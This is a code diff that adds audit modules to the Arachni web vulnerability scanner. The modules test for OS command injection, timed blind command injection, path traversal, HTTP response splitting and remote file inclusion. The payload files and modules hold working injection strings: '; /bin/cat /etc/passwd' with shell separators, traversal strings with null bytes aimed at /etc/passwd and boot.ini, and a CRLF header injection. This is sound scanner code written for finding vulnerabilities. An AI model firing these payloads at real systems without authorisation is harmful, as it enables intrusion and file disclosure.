arachni 0.2.2.1

data/modules/audit/os_cmd_injection/payloads.txt

@@ -0,0 +1,2 @@
+/bin/cat /etc/passwd
+type %SYSTEMROOT%\\win.ini

data/modules/audit/os_cmd_injection_timing.rb

@@ -0,0 +1,104 @@
+=begin
+                  Arachni
+  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+
+  This is free software; you can copy and distribute and modify
+  this program under the term of the GPL v2.0 License
+  (See LICENSE file for details)
+
+=end
+
+module Arachni
+
+module Modules
+
+#
+# OS command injection module using timing attacks.
+#
+# @author: Tasos "Zapotek" Laskos
+#                                      <tasos.laskos@gmail.com>
+#                                      <zapotek@segfault.gr>
+# @version: 0.2
+#
+# @see http://cwe.mitre.org/data/definitions/78.html
+# @see http://www.owasp.org/index.php/OS_Command_Injection
+#
+class OSCmdInjectionTiming < Arachni::Module::Base
+
+    include Arachni::Module::Utilities
+
+    def initialize( page )
+        super( page )
+    end
+
+    def prepare( )
+
+        @@__injection_str ||= []
+
+        if @@__injection_str.empty?
+            read_file( 'payloads.txt' ) {
+                |str|
+
+                [ '', '&&', '|', ';' ].each {
+                    |sep|
+                    @@__injection_str << sep + " " + str
+                }
+
+                @@__injection_str << "`" + str + "`"
+            }
+        end
+
+        @__opts = {
+            :format  => [ Format::STRAIGHT ],
+            :timeout => 4000,
+            :timeout_divider => 1000
+        }
+
+    end
+
+    def run
+        audit_timeout( @@__injection_str, @__opts )
+    end
+
+    def self.info
+        {
+            :name           => 'OS command injection (timing)',
+            :description    => %q{Tries to find operating system command injections using timing attacks.},
+            :elements       => [
+                Issue::Element::FORM,
+                Issue::Element::LINK,
+                Issue::Element::COOKIE,
+                Issue::Element::HEADER
+            ],
+            :author         => 'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com> ',
+            :version        => '0.1',
+            :references     => {
+                 'OWASP'         => 'http://www.owasp.org/index.php/OS_Command_Injection'
+            },
+            :targets        => { 'Generic' => 'all' },
+            :issue   => {
+                :name        => %q{Operating system command injection (timing attack)},
+                :description => %q{The web application allows an attacker to
+                    execute arbitrary OS commands even though it does not return
+                    the command output in the HTML body.
+                    (This issue was discovered using a timing attack; timing attacks
+                    can result in false positives in cases where the server takes
+                    an abnormally long time to respond.
+                    Either case, these issues will require further investigation
+                    even if they are false positives.)},
+                :tags        => [ 'os', 'command', 'code', 'injection', 'timing', 'blind' ],
+                :cwe         => '78',
+                :severity    => Issue::Severity::HIGH,
+                :cvssv2       => '9.0',
+                :remedy_guidance    => %q{User inputs must be validated and filtered
+                    before being evaluated as OS level commands.},
+                :remedy_code => '',
+                :metasploitable => 'unix/webapp/arachni_exec'
+            }
+
+        }
+    end
+
+end
+end
+end

data/modules/audit/os_cmd_injection_timing/payloads.txt

@@ -0,0 +1,3 @@
+ping -n __TIME__ localhost
+ping -c __TIME__ localhost
+/usr/sbin/ping -s localhost 1000 10

data/modules/audit/path_traversal.rb

@@ -0,0 +1,141 @@
+=begin
+                  Arachni
+  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+
+  This is free software; you can copy and distribute and modify
+  this program under the term of the GPL v2.0 License
+  (See LICENSE file for details)
+
+=end
+
+module Arachni
+
+module Modules
+
+#
+# Path Traversal audit module.
+#
+# @author: Tasos "Zapotek" Laskos
+#                                      <tasos.laskos@gmail.com>
+#                                      <zapotek@segfault.gr>
+# @version: 0.2.1
+#
+# @see http://cwe.mitre.org/data/definitions/22.html
+# @see http://www.owasp.org/index.php/Path_Traversal
+# @see http://projects.webappsec.org/Path-Traversal
+#
+class PathTraversal < Arachni::Module::Base
+
+    def initialize( page )
+        super( page )
+
+        @results    = []
+    end
+
+    def prepare( )
+
+        #
+        # the way this works is pretty cool since it will actually
+        # exploit the vulnerability in order to verify that it worked
+        # which also means that the results of the exploitation will
+        # appear in the report.
+        #
+        # *but* we may run into a web page that details the structure of
+        # the 'passwd' file and get a false positive; so we need to check
+        # the html code in @page.html before checking the responses of the audit
+        # and give accurate feedback about the context in which the vulnerability
+        # was flagged.
+        #
+
+
+        @__trv =  '../../../../../../../../../../../../../../../../'
+        @__ext = [
+            "",
+            "\0.htm",
+            "\0.html",
+            "\0.asp",
+            "\0.aspx",
+            "\0.php",
+            "\0.txt",
+            "\0.gif",
+            "\0.jpg",
+            "\0.jpeg",
+            "\0.png",
+            "\0.css"
+        ]
+
+        @__params = [
+            {
+                'value'  => 'etc/passwd',
+                'regexp' => /\w+:.+:[0-9]+:[0-9]+:.+:[0-9a-zA-Z\/]+/i
+            },
+            {
+                'value'  => 'boot.ini',
+                'regexp' => /\[boot loader\](.*)\[operating systems\]/i
+            }
+
+        ]
+
+        @__opts = {
+            # we don't want the Auditor to interfere with our injecion strings
+            :format => [ Format::STRAIGHT ],
+        }
+
+    end
+
+    def run( )
+
+        @__params.each {
+            |param|
+
+            @__opts[:regexp] = param['regexp']
+            @__ext.each {
+                |ext|
+
+                injection_str = @__trv + param['value'] + ext
+                audit( injection_str, @__opts )
+            }
+        }
+    end
+
+
+    def self.info
+        {
+            :name           => 'PathTraversal',
+            :description    => %q{It injects paths of common files (/etc/passwd and boot.ini)
+                and evaluates the existance of a path traversal vulnerability
+                based on the presence of relevant content in the HTML responses.},
+            :elements       => [
+                Issue::Element::FORM,
+                Issue::Element::LINK,
+                Issue::Element::COOKIE,
+                Issue::Element::HEADER
+            ],
+            :author         => 'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com> ',
+            :version        => '0.2.1',
+            :references     => {
+                'OWASP' => 'http://www.owasp.org/index.php/Path_Traversal',
+                'WASC'  => 'http://projects.webappsec.org/Path-Traversal'
+            },
+            :targets        => { 'Generic' => 'all' },
+
+            :issue   => {
+                :name        => %q{Path Traversal},
+                :description => %q{The web application enforces improper limitation
+                    of a pathname to a restricted directory.},
+                :tags        => [ 'path', 'traversal', 'injection', 'regexp' ],
+                :cwe         => '22',
+                :severity    => Issue::Severity::MEDIUM,
+                :cvssv2       => '4.3',
+                :remedy_guidance    => %q{User inputs must be validated and filtered
+                    before being used as a part of a filesystem path.},
+                :remedy_code => '',
+                :metasploitable => 'unix/webapp/arachni_path_traversal'
+            }
+
+        }
+    end
+
+end
+end
+end

data/modules/audit/response_splitting.rb

@@ -0,0 +1,105 @@
+=begin
+                  Arachni
+  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+
+  This is free software; you can copy and distribute and modify
+  this program under the term of the GPL v2.0 License
+  (See LICENSE file for details)
+
+=end
+
+module Arachni
+
+module Modules
+
+#
+# HTTP Response Splitting audit module.
+#
+# It audits links, forms and cookies.
+#
+#
+# @author: Tasos "Zapotek" Laskos
+#                                      <tasos.laskos@gmail.com>
+#                                      <zapotek@segfault.gr>
+# @version: 0.1.5
+#
+# @see http://cwe.mitre.org/data/definitions/20.html
+# @see http://www.owasp.org/index.php/HTTP_Response_Splitting
+# @see http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
+#
+class ResponseSplitting < Arachni::Module::Base
+
+    def initialize( page )
+        super( page )
+
+        # initialize the header
+        @__header = ''
+
+        # initialize the array that will hold the results
+        @results = []
+    end
+
+    def prepare( )
+
+        # the header to inject...
+        # what we will check for in the response header
+        # is the existence of the "x-crlf-safe" field.
+        # if we find it it means that the attack was succesful
+        # thus site is vulnerable.
+        @__header = "\r\nX-CRLF-Safe: no"
+    end
+
+    def run( )
+
+        # try to inject the headers into all vectors
+        # and pass a block that will check for a positive result
+        audit( @__header, :param_flip => true ) {
+            |res, opts|
+            if res.headers_hash['X-CRLF-Safe'] &&
+               !res.headers_hash['X-CRLF-Safe'].empty?
+
+                opts[:injected] = URI.encode( opts[:injected] )
+                log( opts, res )
+            end
+        }
+    end
+
+
+    def self.info
+        {
+            :name           => 'ResponseSplitting',
+            :description    => %q{Tries to inject some data into the webapp and figure out
+                if any of them end up in the response header.},
+            :elements       => [
+                Issue::Element::FORM,
+                Issue::Element::LINK,
+                Issue::Element::COOKIE,
+                Issue::Element::HEADER
+            ],
+            :author         => 'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com> ',
+            :version        => '0.1.5',
+            :references     => {
+                 'SecuriTeam'    => 'http://www.securiteam.com/securityreviews/5WP0E2KFGK.html',
+                 'OWASP'         => 'http://www.owasp.org/index.php/HTTP_Response_Splitting'
+            },
+            :targets        => { 'Generic' => 'all' },
+
+            :issue   => {
+                :name        => %q{Response splitting},
+                :description => %q{The web application includes user input
+                     in the response HTTP header.},
+                :tags        => [ 'response', 'splitting', 'injection', 'header' ],
+                :cwe         => '20',
+                :severity    => Issue::Severity::MEDIUM,
+                :cvssv2       => '5.0',
+                :remedy_guidance    => %q{User inputs must be validated and filtered
+                    before being included as part of the HTTP response headers.},
+                :remedy_code => '',
+            }
+
+        }
+    end
+
+end
+end
+end

data/modules/audit/rfi.rb

@@ -0,0 +1,193 @@
+=begin
+  $Id$
+
+                  Arachni
+  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
+
+  This is free software; you can copy and distribute and modify
+  this program under the term of the GPL v2.0 License
+  (See LICENSE file for details)
+
+=end
+
+module Arachni
+
+module Modules
+
+#
+# Simple Remote File Inclusion tutorial module.
+#
+# It audits links, forms and cookies and will give you a good idea<br/>
+# of how to write modules for Arachni.
+#
+#
+# @author: Tasos "Zapotek" Laskos
+#                                      <tasos.laskos@gmail.com>
+#                                      <zapotek@segfault.gr>
+# @version: 0.1.3
+#
+# @see http://cwe.mitre.org/data/definitions/94.html
+# @see http://projects.webappsec.org/Remote-File-Inclusion
+# @see http://en.wikipedia.org/wiki/Remote_File_Inclusion
+#
+class RFI < Arachni::Module::Base # *always* extend Arachni::Module::Base
+
+    #
+    # Arachni::Module::HTTP instance
+    #
+    # You don't really need to declare this,
+    # you inherit it from Arachni::Module
+    #
+    # It's an initialized object of the Arachni::Module::HTTP instance
+    # class configured with proxy, authentication, SSL settings etc.
+    #
+    # Look at Arachni::Module::HTTP instance doc to see what you get.
+    #
+    # If you need direct access to the Net::HTTP session you can get
+    # it from @http.session
+    #
+    # @return [Arachni::Module::HTTP]
+    #
+    attr_reader :http
+
+    #
+    # REQUIRED
+    #
+    # Initializes the module and the parent.
+    #
+    # @see Arachni::Module::Base
+    # @see Page
+    #
+    # @param    [Page]    page    you can always expect this to be provided
+    #                               by the system.
+    #
+    def initialize( page )
+        # unless you want to do something freaky
+        # *do not* ommit the following line
+        super( page )
+
+        # init your stuff here
+    end
+
+    #
+    # OPTIONAL
+    #
+    # Gets called before any other method, right after initialization.
+    # It provides you with a way to setup your module's data.
+    #
+    # It may be redundant but it's optional anyways...
+    #
+    def prepare( )
+        #
+        # You can use print_debug() for debugging.
+        # Don't over-do ti though, debugging messages are supposed to
+        # be helpful don't flood the output.
+        #
+        # Debugging output will only appear if "--debug" is enabled.
+        #
+        print_debug( 'In prepare()' )
+
+        #
+        # you can setup your module's environment as you wish
+        # but it's good practice to prefix your attributes and methods
+        # with 2 underscores ( @__foo_attr, __foo_meth() )
+        #
+        @__opts = {}
+        @__opts[:substring] = '705cd559b16e6946826207c2199bd890'
+
+        # inject this url to assess RFI
+        @__injection_url = 'http://zapotek.github.com/arachni/rfi.md5.txt'
+
+
+        #
+        # the module can be made to detect XSS and many other kinds
+        # of attack just as easily if you adjust the above attributes
+        # accordingly.
+        #
+
+    end
+
+    #
+    # REQUIRED
+    #
+    # This is used to deliver the module's payload whatever it may be.
+    #
+    def run( )
+        print_debug(  'In run()' )
+
+        audit( @__injection_url, @__opts )
+    end
+
+    #
+    # OPTIONAL
+    #
+    # This is called after run() has finished executing,
+    # it allows you to clean up after yourself.
+    #
+    # May also be redundant but, once again, it's optional
+    #
+    def clean_up( )
+        print_debug( 'In clean_up()' )
+    end
+
+    #
+    # REQUIRED
+    #
+    # Do not ommit any of the info.
+    #
+    def self.info
+        {
+            :name           => 'Remote File Inclusion',
+            :description    => %q{It injects a remote URL in all available
+                inputs and checks for relevant content in the HTTP response body.},
+            #
+            # Arachni needs to know what elements the module plans to audit
+            # before invoking it. If a page doesn't have any of those elements
+            # there's no point putting the module in the thread queue.
+            #
+            # If you want the module to run no-matter what leave the array
+            # empty or don't define it at all.
+            #
+            :elements       => [
+                Issue::Element::FORM,
+                Issue::Element::LINK,
+                Issue::Element::COOKIE,
+                Issue::Element::HEADER
+            ],
+            :author         => 'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com> ',
+            :version        => '0.1.3',
+            :references     => {
+                'WASC'       => 'http://projects.webappsec.org/Remote-File-Inclusion',
+                'Wikipedia'  => 'http://en.wikipedia.org/wiki/Remote_File_Inclusion'
+            },
+            :targets        => { 'Generic' => 'all' },
+
+            :issue   => {
+                :name        => %q{Remote file inclusion},
+                :description => %q{The web application can be forced to include
+                    3rd party remote content which can often lead to arbitrary code
+                    execution, amongst other attacks.},
+                :tags        => [ 'remote', 'file', 'inclusion', 'injection', 'regexp' ],
+                :cwe         => '94',
+                #
+                # Severity can be:
+                #
+                # Issue::Severity::HIGH
+                # Issue::Severity::MEDIUM
+                # Issue::Severity::LOW
+                # Issue::Severity::INFORMATIONAL
+                #
+                :severity    => Issue::Severity::HIGH,
+                :cvssv2      => '7.5',
+                :remedy_guidance    => %q{Enforce strict validation and filtering
+                    on user inputs.},
+                :remedy_code => '',
+                :metasploitable	=> 'unix/webapp/arachni_php_include'
+            }
+
+        }
+    end
+
+end
+end
+end